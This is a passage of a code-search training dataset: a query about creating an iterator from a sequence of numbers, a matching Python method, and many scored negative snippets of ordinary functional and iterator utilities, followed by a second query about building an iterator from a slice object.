Result:\n out = []\n for args1 in itertools.product(*args):\n val = f(*args1)\n out.append(val)\n return out\n return inner", "def body(i, *args):\n del args\n fn_result = fn(ctx, iterator.get_next())\n flat_last_step_outputs = nest.flatten(ctx.last_step_outputs)\n with ops.control_dependencies([fn_result]):\n return [i + 1] + flat_last_step_outputs", "def n_ary(f):\n def n_ary_fn(x, *args):\n return x if not args else f(x, n_ary_fn(*args))\n return n_ary_fn", "def apply_function(f, args):\n if len(signature(f).parameters) == len(args):\n func = curry(f)\n for arg_value in args:\n func = func(arg_value)\n return func()\n else:\n raise Exception(\"the number of function's parameter is not matched args, len(args): \", len(args))", "def power_unary(x, n, f):\n return reduce(lambda g, h: lambda x: g(h(x)), itertools.repeat(f, n))(x)", "def stop_after_n_iter(n_iteration: int):\n return lambda iteration, **kwargs: iteration>=n_iteration", "def applyToEach(L,f):\n for i in range(len(L)):\n L[i] = f(L[i])", "def run_trials(f, n):\n\tfor value in range(2, 3):\n\t\tprint(\"{:>3}:{:>5}\".format(value, f(n, value)))", "def fn(n):\n if n == 0: return 1\n return sum(fn(i)*fn(n-i-1) for i in range(n))", "def basis_fns(n=0):\n return lambda x: np.sum(x ** (n+1), axis=1)", "def progression(first_item:int, amount:int,func):\n item = first_item\n count = 0\n stop = False\n while count < amount and not stop:\n stop = yield item\n item = func(item)\n count += 1", "def _iterate_over_factors(self, func, args):\n # TODO The user may prefer to provide the arguments as lists and receive them as\n # TODO lists, as this may be the form in which they are available. This should\n # TODO be allowed, rather than packing and unpacking them repeatedly.\n args_list, numerical_args = self._validate_and_prepare_args_for_iteration(args)\n\n out = [\n self._get_method(self.factors[i], func, args_list[i], numerical_args)\n for i in range(len(self.factors))\n ]\n if self._pool_outputs:\n return self._pool_outputs_from_function(out)\n return out", "def filter_n(function, iterable, **kwargs) -> iter:\n n_pass, n_fail = 0, 0\n\n for item in iterable:\n if function(item, **kwargs):\n yield item\n n_pass += 1\n else:\n n_fail += 1\n\n LOGGER.info(\"Filter %s: output %s rows (dropped %s rows)\", function.__name__, n_pass, n_fail)", "def iterate(self, batch_size=8, func=None):\n raise NotImplementedError()", "def n_ary(f):\n def n_ary_f(x,*args):\n return x if not args else f(x,n_ary_f(*args))\n return n_ary_f", "def foreach(func, iterable):\n\n\tfor x in iterable:\n\t\tfunc(x)", "def repeat_every(repeats=5, every=2):\n\n def repeat_wrapper(func):\n @functools.wraps(func)\n def func_wrapper(*args, **kwargs):\n for _ in range(repeats):\n value = func(*args, **kwargs)\n if value:\n return value\n time.sleep(every)\n\n return func_wrapper\n\n return repeat_wrapper", "def for_loop(num_iters, body, initial_args):\n for i in range(num_iters):\n if i == 0:\n outputs = body(*initial_args)\n else:\n outputs = body(*outputs)\n return outputs", "def n_ary(f):\n #def n_ary_f(x, *args):\n #if len(args) == 0:\n #return x\n #return f(x,n_ary_f(args[0],*args[1:]))\n def n_ary_f(x, *args):\n return x if not args else f(x,n_ary_f(*args))\n return n_ary_f", "def apply(self, func, *args):\n pass", "def iterate(iterator, n):\n # throw away n-1 elements\n for index in range(1, n):\n next(iterator, None)\n\n return next(iterator, None)", "def n_ary(func):\n def wrapper(x, *args):\n return x if not args else func(x, wrapper(*args))\n return wrapper", "def cycle(f1, f2, f3):\n \"*** YOUR CODE HERE ***\"\n def f_n(n):\n def f_x(x):\n i = 0\n while i < n:\n if i%3 == 0:\n x = f1(x)\n elif i%3 == 1:\n x = f2(x)\n else:\n x = f3(x)\n i += 1\n return x\n return f_x\n return f_n", "def fold(iterable, func, base):\n acc = base\n for element in iterable:\n acc = func(acc, element)\n return acc", "def after(n):\n\n def decorate(fn):\n i = 0\n\n @wraps(fn)\n def wrapped(*args, **kwargs):\n nonlocal i\n i += 1\n if i >= n:\n return fn(*args, **kwargs)\n\n return wrapped\n\n return decorate", "def repeat(num_times):\n\n def decorator_repeat(func):\n \"\"\"\n defines wrapper_repeat(*args, **kwargs)\n\n :returns: wrapper_repeat\n \"\"\"\n\n @functools.wraps(func)\n def wrapper_repeat(*args, **kwargs):\n \"\"\"\n func(*args, **kwargs) num_times\n\n :return: last return value\n \"\"\"\n for _ in range(num_times):\n value = func(*args, **kwargs)\n return value\n\n return wrapper_repeat\n\n return decorator_repeat", "def each(self, func):\n\n for i in self._:\n func(i)\n return self", "def benchmarkFunc(iter, args=()):\n def decorator(func):\n benchmarkFuncs.append((func, args, iter))\n return func\n return decorator", "def test_func(f, n):\n t = [[1]] * n\n\n start = etime()\n f(t, [])\n end = etime()\n elapsed = end - start\n return elapsed", "def apply_ntimes(func, n, args, verbose=True, timeout=None):\n pool = multiprocessing.Pool()\n\n multiple_results = [pool.apply_async(func, args) for _ in range(n)]\n\n pool.close()\n \n return [res.get(timeout) for res in tqdm(multiple_results, desc='# apply_ntimes', disable = True)]", "def sequential(self, func, args_dict=None):\n for uri, cf in self._cfs.items():\n args = self._process_args_dict(cf, uri, args_dict)\n func(*args)", "def take(iterable, n):\n\n def taking(iterable_):\n for i, e in enumerate(iterable_):\n if i < n:\n yield e\n\n return taking(iterable)", "def sliced_fun(f, n_slices):\n\n def sliced_f(sliced_inputs, non_sliced_inputs=None):\n if non_sliced_inputs is None:\n non_sliced_inputs = []\n if isinstance(non_sliced_inputs, tuple):\n non_sliced_inputs = list(non_sliced_inputs)\n n_paths = len(sliced_inputs[0])\n slice_size = max(1, n_paths // n_slices)\n ret_vals = None\n for start in range(0, n_paths, slice_size):\n inputs_slice = [v[start:start + slice_size] for v in sliced_inputs]\n slice_ret_vals = f(*(inputs_slice + non_sliced_inputs))\n if not isinstance(slice_ret_vals, (tuple, list)):\n slice_ret_vals_as_list = [slice_ret_vals]\n else:\n slice_ret_vals_as_list = slice_ret_vals\n scaled_ret_vals = [\n np.asarray(v) * len(inputs_slice[0])\n for v in slice_ret_vals_as_list\n ]\n if ret_vals is None:\n ret_vals = scaled_ret_vals\n else:\n ret_vals = [x + y for x, y in zip(ret_vals, scaled_ret_vals)]\n ret_vals = [v / n_paths for v in ret_vals]\n if not isinstance(slice_ret_vals, (tuple, list)):\n ret_vals = ret_vals[0]\n elif isinstance(slice_ret_vals, tuple):\n ret_vals = tuple(ret_vals)\n return ret_vals\n\n return sliced_f", "def down_to(self, n, fn):\n for i in range(self._, n, -1):\n fn(i)\n return self", "def timedcalls(n, fn, *args):\n if isinstance(n, int):\n times = [timedcall(fn, *args)[0] for _ in xrange(n)]\n\n elif isinstance(n, float):\n timer, times = 0.0, []\n while timer < n:\n times.append(timedcall(fn, *args)[0])\n timer += times[-1]\n\n return min(times), average(times), max(times)", "def take(n):\n def _take_xducer(step):\n outer_vars = {\"counter\": n}\n def _take_step(r=Missing, x=Missing):\n if r is Missing: return step()\n if x is Missing:\n return step(r)\n n = outer_vars[\"counter\"]\n outer_vars[\"counter\"] -= 1\n r = step(r, x) if n > 0 else r\n return ensure_reduced(r) if outer_vars[\"counter\"] <= 0 else r\n return _take_step\n return _take_xducer", "def measure_func(func, args, number=1):\n f = partial(func, *args) # pylint: disable=W0142\n while True:\n start = timer()\n r = timeit.repeat(f, number=number, repeat=1)\n if timer() - start > 1: # at least 1 second per measurement\n break\n number *= 2\n return min(r + timeit.repeat(f, number=number, repeat=2)) / number", "def apply(self, func, *args, **kwargs):\n pass", "def scanr(func, start, itr):\n if not callable(func):\n raise TypeError(\"First argument to scanr must be callable\")\n itr = iter(itr)\n \n return _scanr(func, start, itr)", "def repeat(seq, n):\n for e in seq:\n for _ in range(n):\n yield e", "def postorderIterArgs(limit=sys.getrecursionlimit(), testFn=isIterable, *args):\n if limit:\n last = None\n for arg in args:\n if testFn(arg):\n for a in postorderIterArgs(limit - 1, testFn, *arg):\n yield a\n else:\n if last:\n yield last\n last = arg\n if last:\n yield last\n else:\n for arg in args:\n yield arg", "def apply_along_0_nb(a, apply_func_nb, *args):\n out = np.empty_like(a, dtype=np.float_)\n for col in range(a.shape[1]):\n out[:, col] = apply_func_nb(col, a[:, col], *args)\n return out", "def incr(n=1):\n for i in xrange(n):\n pulse_hi(INCR)", "def map_multi_args(self, func, iterable, chunksize=None):\n assert self._state == RUN\n return self.map_async(one_to_many(func), iterable, chunksize).get()", "def process_list(_func, iterator, *args, **kwargs):\n return [_func(i, *args, **kwargs) for i in iterator]", "def take_nth(n):\n def _take_nth_xducer(step):\n outer = {\"idx\": 0}\n def _take_nth_step(r=Missing, x=Missing):\n if r is Missing: return step()\n if x is Missing:\n return step(r)\n if outer[\"idx\"] % n:\n outer[\"idx\"] += 1\n return r\n else:\n outer[\"idx\"] += 1\n return step(r, x)\n return _take_nth_step\n return _take_nth_xducer", "def foldr(func, start, itr):\n return _foldr(func, start, iter(itr))", "def expanding_apply_nb(a, apply_func_nb, *args):\n return rolling_apply_nb(a, a.shape[0], apply_func_nb, *args)", "def eager_map(func, iterable):\n for _ in map(func, iterable):\n continue", "def _pipe_and_accumulate(val, fns):\n for fn in fns:\n val = fn(val)\n yield val", "def test_lambda(n):\n for i in range(n):\n yield lambda : i", "def apply(self, *input_):\n result = None\n for function in reversed(self._functions):\n if result is None:\n result = function(*input_)\n else:\n result = function(result)\n return result", "def map(iterable, function):\n for x in iterable:\n yield function(x)", "def foreach(function):\n return partial(map, function)", "def Moments(func, n, limits=(0, np.inf), args={}):\n if args=={}:\n _func = lambda x: func(x)\n else:\n _func = lambda x: func(x, **args)\n if type(n) == type([]):\n result = [i for i in n]\n for i in n:\n function = lambda x: _func(x)*x**i\n result[i] = quad(function, limits[0], limits[1])\n else: \n function = lambda x: _func(x)*x**n\n result = quad(function, limits[0], limits[1])\n return result", "def wrapper(self, nth):\n\n if isinstance(nth, int):\n return function(self, nth)\n \n else:\n raise TypeError('Invalid input! Argument must be integer.')", "def wrapper(self, nth):\n\n if isinstance(nth, int):\n return function(self, nth)\n \n else:\n raise TypeError('Invalid input! Argument must be integer.')", "def sum_f(f, xs):\n sum = 0\n for x in xs:\n sum += f(x)\n return sum", "def ireduce(f, it):\n acc = it.next()\n yield acc\n for x in it:\n acc = f(acc, x)\n yield acc", "def repeat(iterable, count=None):\n if count is None:\n while True:\n for sample in iterable:\n yield sample\n else:\n for i in range(count):\n for sample in iterable:\n yield sample", "def reconstruction(B, N):\n\n def _(f):\n return lambda *x: sum(f[i] * B(i)(*x) for i in range(N))\n\n return _", "def generate_numba_apply_func(\n func: Callable[..., Scalar],\n nopython: bool,\n nogil: bool,\n parallel: bool,\n):\n numba_func = jit_user_function(func)\n if TYPE_CHECKING:\n import numba\n else:\n numba = import_optional_dependency(\"numba\")\n\n @numba.jit(nopython=nopython, nogil=nogil, parallel=parallel)\n def roll_apply(\n values: np.ndarray,\n begin: np.ndarray,\n end: np.ndarray,\n minimum_periods: int,\n *args: Any,\n ) -> np.ndarray:\n result = np.empty(len(begin))\n for i in numba.prange(len(result)):\n start = begin[i]\n stop = end[i]\n window = values[start:stop]\n count_nan = np.sum(np.isnan(window))\n if len(window) - count_nan >= minimum_periods:\n result[i] = numba_func(window, *args)\n else:\n result[i] = np.nan\n return result\n\n return roll_apply", "def mystery1(input_val):\n global counter\n for index in range(input_val):\n for dummy_index in range(5):\n counter += 1", "def sequence(f, lst: list) -> list:\n ret = []\n for ele in lst:\n ret.append(f(ele))\n return ret", "def merge_n_reduce(\n function: typing.Callable, arity: int, data: list\n) -> typing.Any:\n while len(data) > 1:\n data_chunk = data[:arity]\n data = data[arity:]\n data.append(function(*data_chunk))\n return data[0]", "def wrapper_fn(*args, **kwargs):\n\n if __enveloop_number_of_loops__[fn.__name__] > 0:\n __enveloop_number_of_loops__[fn.__name__] -= 1\n return fn(*args, **kwargs)\n else:\n del __enveloop_number_of_loops__[fn.__name__]\n if callback:\n return callback(*args, **kwargs)", "def make_incrementor(n):\n return lambda x: x + n", "def lookahead(n, iterable):\n for value in islice(copy.copy(iterable), n, None):\n return value\n raise IndexError(n)", "def chained(func):\n def wrapper(*args, **kwargs):\n for xs in func(*args, **kwargs):\n for x in xs:\n yield x\n return wrapper", "def apply(cls, func):\n raise NotImplementedError", "def multi_apply(func, *args, **kwargs):\n\n pfunc = partial(func, **kwargs) if kwargs else func\n map_results = map(pfunc, *args)\n return tuple(map(list, zip(*map_results)))", "def iterate_until_stable( width, values, count_fn=day11_1_fn, abandon_threshold=4): \n changed=True # just to be able to enter the loop\n while changed:\n changed, values = apply_rules( width, values, count_fn, abandon_threshold )\n return values" ]
[ "0.7455248", "0.7375146", "0.7370228", "0.71860796", "0.7169171", "0.69895", "0.6812954", "0.6778386", "0.675432", "0.6688753", "0.6684521", "0.665017", "0.6537547", "0.64917755", "0.63972217", "0.63972217", "0.6348087", "0.62363607", "0.62081873", "0.6142448", "0.6037471", "0.60039353", "0.597098", "0.5969384", "0.59461665", "0.590863", "0.5859062", "0.58571064", "0.5842316", "0.58056796", "0.5788962", "0.57800955", "0.5777089", "0.57719207", "0.57673883", "0.57585764", "0.57428217", "0.57390743", "0.5723558", "0.57213277", "0.5703385", "0.5701029", "0.5678435", "0.5675957", "0.5672142", "0.5662256", "0.5652795", "0.5652459", "0.5636568", "0.5618811", "0.56085277", "0.5602516", "0.55933625", "0.5584448", "0.5572572", "0.5569556", "0.5566382", "0.5565028", "0.55531406", "0.5533626", "0.5531047", "0.5511404", "0.5507391", "0.55026484", "0.54972875", "0.54804516", "0.54783183", "0.54725564", "0.5467122", "0.5465325", "0.54645294", "0.54635704", "0.54512066", "0.54445046", "0.544408", "0.5419225", "0.5414741", "0.54116106", "0.54060036", "0.5404731", "0.540067", "0.53986883", "0.539856", "0.5394788", "0.5394788", "0.53788567", "0.5370853", "0.5369334", "0.53677297", "0.53664565", "0.5366234", "0.5365993", "0.53630966", "0.53538615", "0.53505456", "0.53471565", "0.53427124", "0.5317019", "0.5316719", "0.53159386" ]
0.6898225
6
Create iterator from sequence of numbers.
def from_sequence(self, seq): return Iter(self._from_sequence(seq))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def numeric_sequence_iteration(self) -> global___Statement.Iteration.NumericSequenceIteration:", "def simple_seq(seq):\n for i in seq:\n yield i", "def numbers():\n for number in range(1, 76):\n yield number", "def __iter__(self):\r\n \r\n return iter(self._by_number)", "def __iter__(self):\n for x in self.seq: yield x", "def integers():\n i = 1\n while True:\n yield i\n i = i + 1", "def integers():\n i = 1\n while True:\n yield i\n i = i + 1", "def __iter__(self):\n return iter(range(1, self.size() + 1))", "def get_numbers(sequence):\r\n\r\n new_list = []\r\n for element in sequence:\r\n if isinstance(element, numbers.Number) == True:\r\n new_list.append(element)\r\n\r\n return new_list", "def seq_ints(n, start=0, step=1):\n return list(range(start, start + n*abs(step), step))", "async def a_enumerate(seq, start=0):\n i = start\n async for val in seq:\n yield i, val\n i += 1", "def FastaM10Iterator(handle, seq_count=...):\n ...", "def uniform_iterator(sequence):\n\n if isinstance(sequence, abc.Mapping):\n return six.iteritems(sequence)\n else:\n return enumerate(sequence)", "def fromSequence(self, sequence):\n for aVal, bVal in sequence:\n self.add(aVal, bVal)\n\n return self", "def iter_sequence_infinite(seq):\n while True:\n for item in seq:\n yield item", "def __iter__(cls):\n return iter(cls.__by_number.values())", "def xrange1(value):\n try:\n i = int(value)\n return [x+1 for x in xrange(i)]\n except:\n return []", "def xrange(*args):\n len_args = len(args)\n if len_args == 1:\n stop = int(args[0])\n start = 0\n step = 1\n elif len_args == 2:\n start = int(args[0])\n stop = int(args[1])\n step = 1\n elif len_args == 3:\n start = int(args[0])\n stop = int(args[1])\n step = int(args[2])\n else:\n raise TypeError(\"xrange() requires 1-3 int arguments\")\n if step < 0:\n bcmp = operator.gt\n elif step > 0:\n bcmp = operator.lt\n else:\n raise StopIteration\n act = int(start)\n while bcmp(act, stop):\n yield act\n act += step", "async def aenumerate(asequence, start=0):\n n = start\n async for elem in asequence:\n yield n, elem\n n += 1", "def __iter__(self) -> Generator:\r\n yield from self.sequence", "def digit_generator(N=1_000_000):\n i = 0\n number = 1\n while N > i:\n for _i in str(number):\n yield _i\n i += 1\n number += 1", "def __init__(self, generator, to_hashable=lambda x: x):\n self.index_to_result = []\n self.hashable_to_index = dict()\n for i, result in enumerate(generator):\n self.index_to_result.append(result)\n hashable = to_hashable(result)\n if hashable in self.hashable_to_index:\n break\n else:\n self.hashable_to_index[hashable] = i\n else:\n raise Exception(\"generator terminated without repeat\")\n self.cycle_begin = self.hashable_to_index[hashable]\n self.cycle_end = i\n self.cycle_length = self.cycle_end - self.cycle_begin\n\n self.first_repeated_result = self.index_to_result[self.cycle_begin]\n self.second_repeated_result = self.index_to_result[self.cycle_end]", "def __init__(self, seq, start=0, header_lines=[], comments=[], end=[], load_headers=True, **kwargs):\n\n self.iter = iter(seq)\n self.start = start if (start or start == 0) else 1\n self.header_lines = header_lines if isinstance(header_lines, (tuple, list)) else [int(e) for e in\n header_lines.split(',') if e]\n self.comment_lines = comments\n self.end = end\n\n self.load_headers = load_headers\n\n self.headers = []\n self.comments = []\n\n int(self.start) # Throw error if it is not an int", "def __iter__(self) -> Iterator:\n if self.ndim > 1:\n for i in range(len(self)):\n yield self[i]\n else:\n # convert in chunks of 10k for efficiency\n data = self.asi8\n length = len(self)\n chunksize = 10000\n chunks = (length // chunksize) + 1\n\n for i in range(chunks):\n start_i = i * chunksize\n end_i = min((i + 1) * chunksize, length)\n converted = ints_to_pydatetime(\n data[start_i:end_i],\n tz=self.tz,\n box=\"timestamp\",\n reso=self._creso,\n )\n yield from converted", "def __init__(self, iterator):\n self.iterator = []\n while iterator.hasNext():\n self.iterator.append(iterator.next())", "def numbers(num):\n r = []\n for i in range(num):\n d = len(r)\n r = [1 if i == 0 or i == d else r[i-1]+r[i] for i in range(d+1)]\n yield r", "def enumerate_list(seq):\n return zip(xrange(len(seq)), seq)", "def __init__(self, iterator):\n self.iterator = iterator\n self.peek_num = None", "def __iter__(self):\n pass\n\n # TODO: range, based on iterator", "def iter_nums():\n saved = dict()\n\n def get_or_zero(x, y):\n \"\"\" Get the value at (x, y) in the cache, or return 0 \"\"\"\n coord = (x, y)\n if coord in saved:\n return saved[coord]\n else:\n return 0\n\n for coord in iter_coords():\n x, y = coord\n if coord == (0, 0):\n val = 1\n else:\n val = 0\n val += get_or_zero(x-1, y-1)\n val += get_or_zero(x, y-1)\n val += get_or_zero(x+1, y-1)\n val += get_or_zero(x-1, y)\n val += get_or_zero(x+1, y)\n val += get_or_zero(x-1, y+1)\n val += get_or_zero(x, y+1)\n val += get_or_zero(x+1, y+1)\n\n saved[coord] = val\n\n yield val", "def xrange0(value):\n try:\n i = int(value)\n return list(xrange(i))\n except:\n return []", "def gen_sequence(a, b, c):\n i = 1\n while True:\n yield a * i**2 + b * i + c\n i += 1", "def intersperse(value, seq):\n seq = iter(seq)\n\n try:\n yield next(seq)\n except StopIteration:\n return\n\n for item in seq:\n yield value\n yield item", "def __iter__(self):\n return self.new_generator()", "def __init__(self, nums):\n self.nums, self.iter = nums, 0", "def __init__(self, iterator):\n self.iterator = iterator\n self.has_next = False\n self.next_val = None\n if self.iterator.hasNext():\n self.has_next = True\n self.next_val = self.iterator.next()", "def __iter__(self):\n for i in range(self.n):\n yield self.get(i, i + 1)", "def __iter__(self):\n # type: () -> Iterator[Any]\n return iter(self[index] for index in range(len(self)))", "def _digits(self, num):\n digits = str(num)\n for digit in digits:\n yield int(digit)", "def __init__(self, sequence):\n self._seq = sequence # Copy of the given data.\n # Reference to the underlying data, will increment to 0 on first call\n # to next element.\n self._k = -1", "def primeset(source: Iterable[int]) -> Iterator[int]:\n for i in source:\n if prime(i):\n yield i", "def random_number_generator(a: int, b: int) -> Iterator[int]:\n numbers = [val for val in range(a, b)]\n\n while numbers:\n yield numbers.pop(random.randint(0, len(numbers) - 1))", "def renumber():\n\n counter = itertools.count(1)\n while True:\n yield 's%s'%counter.next()", "def codon_iter(seq):\n if len(seq) % 3:\n raise ValueError(\"the sequence length are not devided by 3\")\n return string_to_kmers(seq, 3)", "def iter_n(sequence: Sequence[T], n: int) -> List[T]:\n\t\n\tfor i in range(len(sequence) - (n-1)):\n\t\tyield sequence[i:i+n]", "def int_to_seq(i):\n\ts = []\n\tprime = xprimes()\n\twhile i != 1:\n\t\ts.append(0)\n\t\tp = next(prime)\n\t\twhile i % p == 0:\n\t\t\ts[-1] += 1\n\t\t\ti /= p\n\treturn s", "def fromiter(cls, args, **assumptions):\n return cls(*tuple(args), **assumptions)", "def vytvorit_generator():\n mylist = range(3)\n print 'mylist = ', mylist\n for element in mylist:\n yield element", "def __iter__(self):\n for x in self.innings:\n yield x", "def simple_range(limit):\n i = 0\n while i < limit:\n yield i\n i += 1", "def id_generator():\n start_value = 0\n while True:\n yield start_value\n start_value += 1", "def mxrange(lr):\n if len(lr):\n yield ()\n else:\n # it can work with single numbers\n index = lr[0]\n if isinstance(index, int):\n index = [index]\n for a in range(*index):\n for b in mxrange(lr[1:]):\n yield tuple([a] + list(b))", "def e_seq():\n yield 2;\n for n in count(2, 2):\n yield 1\n yield n\n yield 1", "def __iter__(self) -> Iterator[Range]:\n return iter(self._ranges)", "def iseq(start=0, stop=None, inc=1):\n if stop is None: # allow isequence(3) to be 0, 1, 2, 3\n # take 1st arg as stop, start as 0, and inc=1\n stop = start; start = 0; inc = 1\n return range(start, stop+inc, inc)", "def concrete(seq):\n if isinstance(seq, Iterator):\n seq = list(seq)\n if isinstance(seq, (tuple, list)):\n seq = list(map(concrete, seq))\n return seq", "def triangle_numbers():\n counter, tri_number = 1, 1\n while True:\n yield tri_number\n counter += 1\n tri_number += counter", "def __iter__(self):\n return iter(self.to_list())", "def _generate_iterator(self) -> Iterable:\n params: List[Tensor] = []\n for angle_range in self._ranges:\n lin_space: Tensor = linspace(angle_range[0], angle_range[1], steps=self._num_steps)\n params.append(lin_space)\n power: int\n dims: int\n for i in range(0, self._num_params):\n power = len(self._ranges) - 1 - i\n dims = i\n params[i] = params[i].repeat_interleave(self._num_steps ** power)\n params[i] = params[i].broadcast_to((self._num_steps ** dims, self._num_steps ** (power + 1))).flatten()\n return zip(*params)", "def take(n, seq):\n seq = iter(seq)\n result = []\n try:\n for i in range(n):\n result.append(next(seq))\n except StopIteration:\n pass\n return result", "def repeat(seq, n):\n for e in seq:\n for _ in range(n):\n yield e", "def generator(factor: int, test: typing.Callable[[int], bool],\n start: int) -> typing.Iterator[int]:\n value = start\n while True:\n value = (value * factor) % 2147483647\n if test(value):\n yield value", "def to_int(a):\n i = 0\n while a:\n i += 1\n a = a.next\n return i", "def _next(self):\n i = 0\n while i < self.size:\n yield self.data[i]\n i += 1", "def just(n, seq):\n it = iter(seq)\n for _ in range(n - 1):\n yield next(it, None)\n yield tuple(it)", "def seq(min=0.0, max=None, inc=1.0, type=float,\n return_type='NumPyArray'):\n if max is None: # allow sequence(3) to be 0., 1., 2., 3.\n # take 1st arg as max, min as 0, and inc=1\n max = min; min = 0.0; inc = 1.0\n r = arange(min, max + inc/2.0, inc, type)\n if return_type == 'NumPyArray' or return_type == ndarray:\n return r\n elif return_type == 'list':\n return r.tolist()\n elif return_type == 'tuple':\n return tuple(r.tolist())", "def __iter__(self):\n for i in range(len(self)):\n yield self[i]", "def __iter__(self):\n for i in range(len(self)):\n yield self[i]", "def takespread(sequence, num):\n length = float(len(sequence))\n for i in range(num):\n yield sequence[int(np.ceil(i * length / num))]", "def __iter__(self):\n for batch in self.iterator:\n yield Batch.from_iterator_batch(batch, self.pad_index, self.sos_index, self.eos_index)", "def counter_wrapper(generator):\n for value in generator:\n yield value", "def prime_generator() -> Iterator[int]:\n\n num = 2\n while True:\n if is_prime(num):\n yield num\n num += 1", "def iwindow(seq, n):\n it = iter(seq)\n result = tuple(islice(it, n))\n\n if len(result) == n:\n yield result\n\n for elem in it:\n result = result[1:] + (elem,)\n yield result", "def __iter__(self):\n\n # Wanted to do this, but count() only accepts numbers:\n # return count(start, timedelta(days=self.step))\n\n next = self.start\n while (True):\n yield next\n next = next + timedelta(days=self.step)", "def cycle(iterator: Iterable[Any]) -> Iterable[Any]:\n while True:\n yield from iterator", "def takespread(sequence, num):\n length = float(len(sequence))\n for i in range(num):\n yield sequence[int(ceil(i * length / num))]", "def square_numbers_2(nums):\n for i in nums:\n yield(i*i)", "def coordinate_iterator(coords, atoms_per_res):\n assert len(coords) % atoms_per_res == 0, f\"There must be {atoms_per_res}\" \\\n f\" atoms for every residue.\\n\" \\\n f\"len(coords) = {len(coords)}\"\n i = 0\n while i + atoms_per_res <= len(coords):\n yield coords[i:i + atoms_per_res]\n i += atoms_per_res", "def fromiter(iterable, dtype, count=-1):\n\n return call_origin(numpy.fromiter, iterable, dtype, count)", "def iterator(self):\n yield", "def geom_iter(self, g_nums):\n # Using the custom coded pack_tups to not have to care whether the\n # input is iterable\n from .utils import pack_tups\n\n vals = pack_tups(g_nums)\n for val in vals:\n yield self.geom_single(val[0])", "def __next__(self):\n self._k += 1\n if self._k < len(self._seq):\n return(self._seq[self._k])\n else:\n # print('*** End of iteration. ***')\n raise StopIteration()", "def __iter__(self):\n with open(self.fn + \".fai\") as fai:\n for toks in (l.rstrip(\"\\r\\n\").split(\"\\t\") for l in fai):\n yield toks[0], int(toks[1])", "def __iter__(self):\n for idx in range(0, self.Npoints):\n position = self.start + (self.end-self.start)/self.Npoints*idx\n yield position\n raise StopIteration()", "def make_data_iterator(input):\n assert isinstance(input, DataLoader)\n data_iterator = iter(input)\n return data_iterator", "def task_10_generator_of_simple_numbers() -> Generator[int, None, None]:\n def is_num_simple(n):\n \"\"\"\n Return: True if n is a simple number or False if it is not\n \"\"\"\n for i in range(n, 1, -1):\n if n % i == 0 and i < n and n != 1:\n return False\n return True\n\n # generator part\n n = 2\n while n < 200:\n if is_num_simple(n):\n yield n\n n = n + 1", "def __iter__(self) -> Iterator[int]:\n return iter(self._tasks)", "def __iter__(self):\n cursor = 0\n while cursor < len(self):\n yield self._items[cursor]\n cursor += 1", "def item_iter(self, a):\r\n for i in a[0]:\r\n yield i", "def __init__(self, iterator):\n self._iter = iterator", "def construct_sequence_list(self):\n return list(self.iter_sequence())", "def __iter__(self):\n for index in range(len(self)):\n yield self[index]", "def enhancer_iterator(self, data, labels, batch_size, num_steps):\n def seq_to_ints(seq):\n return [self.vocab.word_to_index[c] for c in seq]\n\n # Map raw data to array of ints. if all sequences are the same length L, \n # raw_data will be N-by-L\n mdata = np.array([seq_to_ints(i) for i in data], dtype=np.int32)\n num_batches = len(mdata) // batch_size\n \n # data will have batch_len elements, each of size batch_size\n # ASSUME FIXED SEQUENCE LENGTHS OFF 1000 FOR NOW (5/20/16)\n # Just grab middle self.config.num_steps nucleotides\n a = int(len(mdata[0,:])/2-self.config.num_steps/2)\n b = int(len(mdata[0,:])/2+self.config.num_steps/2)\n for i in range(num_batches):\n x = mdata[batch_size*i:batch_size*(i+1),a:b]\n if labels is not None:\n y = labels[batch_size*i:batch_size*(i+1)]\n else:\n y = None\n yield(x,y)", "def get_integers(bitwidth: int, unsigned: bool, limit: int = 0) -> Generator:\n if unsigned:\n start, stop = 0, ((1 << bitwidth) - 1)\n else:\n start, stop = (-(1 << bitwidth - 1)), (1 << (bitwidth - 1) - 1)\n\n for num in _fuzzdb_integers(limit):\n if num >= start and num <= stop:\n yield num", "def __next__(self):\n\t\tif self.i >= len(self.l):\n\t\t\tself.i = 0\n\t\t\traise StopIteration\n\t\tresult = self.l[self.i]\n\t\tself.i += 1\n\t\treturn result", "def parse_input(data: Iterator[str]) -> Iterator[SnailfishNumber]:\n yield from (SnailfishNumber.from_str(line.strip())\n for line in data)", "def __iter__(self):\n cursor = self.first()\n while cursor is not None:\n yield cursor.element()\n cursor = self.after(cursor)", "def __iter__(self):\n for val in self.value:\n yield val", "def numbers_gen(num) -> Generator[Number, None, None]:\n with open(f'data/phone-numbers-{num}.txt', 'rb') as numbers:\n for number in numbers:\n yield number[:-1]", "def task5(count):\n number_1, number_2 = 1, 1\n for _ in range(count):\n yield number_1\n number_1, number_2 = number_2, number_1 + number_2" ]
[ "0.6523413", "0.6352263", "0.6295878", "0.6285677", "0.6251581", "0.6161719", "0.6161719", "0.6123521", "0.59559906", "0.59429246", "0.5929433", "0.59055716", "0.5842463", "0.58171993", "0.57896346", "0.57666224", "0.57651085", "0.5762295", "0.5750994", "0.5719213", "0.5710208", "0.5660005", "0.5647652", "0.56463015", "0.5594679", "0.5562186", "0.5554404", "0.55411124", "0.55244726", "0.5523953", "0.551829", "0.5512887", "0.5506301", "0.5502796", "0.5461537", "0.5456875", "0.54566455", "0.5444559", "0.54386854", "0.541617", "0.5406899", "0.5405977", "0.5382206", "0.53692025", "0.5357977", "0.5354353", "0.5348255", "0.5342732", "0.5320226", "0.5319833", "0.53174233", "0.531431", "0.53075397", "0.52737164", "0.52711916", "0.52660334", "0.5256489", "0.525456", "0.525283", "0.5242673", "0.5222617", "0.5220848", "0.5211441", "0.5205737", "0.5191523", "0.5189647", "0.5188273", "0.5188273", "0.51853275", "0.5184499", "0.51843673", "0.51780784", "0.5176253", "0.51672417", "0.5164649", "0.5162953", "0.51620734", "0.51611775", "0.5158733", "0.5147183", "0.51457864", "0.5143809", "0.5143065", "0.5139063", "0.5137835", "0.51337695", "0.513222", "0.51314217", "0.5129203", "0.51274294", "0.51250637", "0.5123991", "0.5119622", "0.5115771", "0.5110735", "0.51070136", "0.5106897", "0.5106381", "0.51042503", "0.50986344" ]
0.70666045
0
Create iterator from slice object.
def from_slice(self, slice): start = 0 if slice.start is None else slice.start step = 1 if slice.step is None else slice.step return self.count(start, step, stop=slice.step)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
